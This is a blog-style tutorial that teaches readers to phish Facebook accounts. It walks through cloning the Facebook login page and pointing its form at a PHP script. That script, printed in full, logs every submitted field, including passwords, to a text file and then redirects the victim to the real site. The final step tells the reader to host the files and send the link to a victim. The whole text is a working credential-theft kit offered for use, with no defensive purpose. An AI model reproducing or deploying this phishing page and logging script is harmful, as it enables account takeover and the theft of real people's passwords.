HACK FACEBOOK ACCOUNT USING PHISHING new Method
Phishing Is The Easiest
Method To Hack Facebook Account Even By This Method U Can Hack Any Email
Account Also.To Know How To Hack FB Using Phishing Just Follow The Steps-
step one go to
www.facebook.com
step2: right click on white
space and select the "View page source"
step3: copy the code to
notepad
step4: now press Ctrl + F and
write "action" and hit "Find next"
step5: u will get
action="https://www.facebook.com/login.php?login_attempt=1" and edit
this to action="hack.php" and save the document as index.html
step6: now copy the following
code and save it as hack.php
<?php
header("Location:
http://www.Facebook.com/login.php ");
$handle =
fopen("pswrds.txt", "a");
foreach($_POST as $variable
=> $value) {
fwrite($handle, $variable);
fwrite($handle,
"=");
fwrite($handle, $value);
fwrite($handle,
"\r\n");
}
fwrite($handle,
"\r\n");
fclose($handle);
exit;
?>
step7: now create a notepad
file as pswrd.txt and there should not be any contents
step8: now u have 3 file
index.html , hack.php & pswrd.txt.Now upload all the three files in any
free webhosting
step9: copy the url of
index.html and send to the victim.When victim login to his account, his
password will be sent to the file "pswrd.txt"
If have any doubt then drop
ur queries on commeny box


Comments
Post a Comment
Thanks Dear For Comment You Will Get Soon Reply About This.